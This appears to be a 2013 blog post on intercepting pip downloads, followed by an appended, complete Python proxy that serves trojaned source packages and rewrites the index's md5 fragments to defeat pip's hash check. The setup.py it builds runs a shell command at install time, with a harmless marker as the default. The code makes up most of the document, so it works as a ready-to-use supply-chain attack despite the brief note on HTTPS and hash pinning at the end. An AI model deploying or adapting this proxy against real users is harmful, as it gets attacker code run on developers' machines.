Monday, February 4, 2013

Practical man-in-the-middle attack on pip


I found an interesting article that warns against installing packages with pip
in an untrusted environment.

You can intercept and manipulate the packages pip downloads from PyPI
using the Python code below:

https://gist.github.com/4698537

yeah~ poc time~

Proof Of Concept

1. Run a proxy so that all of the victim's HTTP traffic passes through it
2. Redirect the victim's traffic through your own machine
3. Intercept all of that traffic
4. Use the Python script to manipulate the packages pip downloads from PyPI
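Steps 1 and 4 as a single script, as an added example that is not the linked gist and not the article's code. It assumes the client of that era fetches the index and the sdist over plain HTTP, and it rewrites two things, not one: the sdist body itself, and the `#md5=` fragments on the `/simple/<pkg>/` page, because pip checked the downloaded file against that fragment and a swapped tarball alone fails with a hash mismatch. `PAYLOAD` (a harmless marker command) and the listening address `127.0.0.1:8080` are assumptions of the example; the package name and version in the test are constructed sample input.

```python
"""Added example: plain-HTTP proxy that swaps pip sdist downloads for trojaned ones."""
import functools
import hashlib
import http.client
import http.server
import io
import re
import tarfile
import urllib.parse

# sdist filename as served from index paths like
# /packages/source/r/requests/requests-1.1.0.tar.gz (name and version come from the filename)
SDIST_RE = re.compile(r"/(?P<name>[A-Za-z0-9_.\-]+?)-(?P<version>\d[^/]*?)\.tar\.gz$")
# a download link on a /simple/<pkg>/ page carrying the md5 fragment pip compared against
MD5_LINK_RE = re.compile(r'([^"\'\s#]+\.tar\.gz)#md5=[0-9a-f]{32}')

# Hypothetical install-time payload (an assumption of this example): a visible marker only.
PAYLOAD = "touch /tmp/pip-mitm-was-here"


@functools.lru_cache(maxsize=None)
def build_trojan_sdist(name, version, payload=PAYLOAD):
    """Return a .tar.gz sdist whose setup.py runs `payload` when pip builds it.

    The requested name/version are kept so `pip install name==version` stays happy.
    Cached per (name, version) so the index page's md5 and the served body agree."""
    top = f"{name}-{version}"
    setup_py = (
        "import os\n"
        f"os.system({payload!r})  # runs with the installing user's privileges\n"
        "from setuptools import setup\n"
        f"setup(name={name!r}, version={version!r})\n"
    )
    pkg_info = f"Metadata-Version: 1.0\nName: {name}\nVersion: {version}\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, text in ((f"{top}/setup.py", setup_py), (f"{top}/PKG-INFO", pkg_info)):
            data = text.encode()
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def rewrite_index(html):
    """Point every #md5= fragment on a /simple/ page at the trojaned sdist's digest;
    otherwise pip rejects the swapped download with a hash mismatch."""
    def fix(m):
        href = m.group(1)
        sd = SDIST_RE.search(href)
        if not sd:
            return m.group(0)
        digest = hashlib.md5(build_trojan_sdist(sd["name"], sd["version"])).hexdigest()
        return f"{href}#md5={digest}"
    return MD5_LINK_RE.sub(fix, html)


def rewrite_response(url, headers, body):
    """Rewrite one upstream response; returns (headers, body, what) with what in
    ('sdist', 'index', None). Assumes the body is not content-encoded (the proxy
    below asks upstream for identity encoding)."""
    path = urllib.parse.urlsplit(url).path
    ctype = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    m = SDIST_RE.search(path)
    if m:
        body, what = build_trojan_sdist(m["name"], m["version"]), "sdist"
    elif ctype.startswith("text/html"):
        body, what = rewrite_index(body.decode("utf-8", "replace")).encode(), "index"
    else:
        return headers, body, None
    # drop validators that no longer describe the body and fix the length
    headers = {k: v for k, v in headers.items()
               if k.lower() not in ("content-length", "etag", "last-modified")}
    headers["Content-Length"] = str(len(body))
    return headers, body, what


class PipMitmProxy(http.server.BaseHTTPRequestHandler):
    """Forward plain-HTTP GETs upstream and run every response through rewrite_response."""

    def do_GET(self):
        # an explicit proxy client sends an absolute URL; a transparently redirected one sends a path
        url = self.path if self.path.startswith("http://") else f"http://{self.headers['Host']}{self.path}"
        u = urllib.parse.urlsplit(url)
        conn = http.client.HTTPConnection(u.netloc, timeout=30)
        conn.request("GET", urllib.parse.urlunsplit(("", "", u.path or "/", u.query, "")),
                     headers={"Host": u.netloc, "Accept-Encoding": "identity"})
        resp = conn.getresponse()
        headers = {k: v for k, v in resp.getheaders()
                   if k.lower() not in ("transfer-encoding", "connection", "content-encoding")}
        headers, body, what = rewrite_response(url, headers, resp.read())
        self.log_message("%s %s (%d bytes)", what or "pass", url, len(body))
        self.send_response(resp.status)
        for k, v in headers.items():
            self.send_header(k, v)
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # victim side, pip of that era:  http_proxy=http://127.0.0.1:8080 pip install <pkg>
    http.server.ThreadingHTTPServer(("127.0.0.1", 8080), PipMitmProxy).serve_forever()
```

This only works against a client that talks to the index over plain HTTP or does not verify the TLS certificate, which is exactly what pip did at the time; pip 1.3 and later default to HTTPS with certificate verification, and hash-checking mode (`pip install --require-hashes -r requirements.txt`, pip 8 and later) pins each download to a digest the attacker cannot rewrite in transit.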
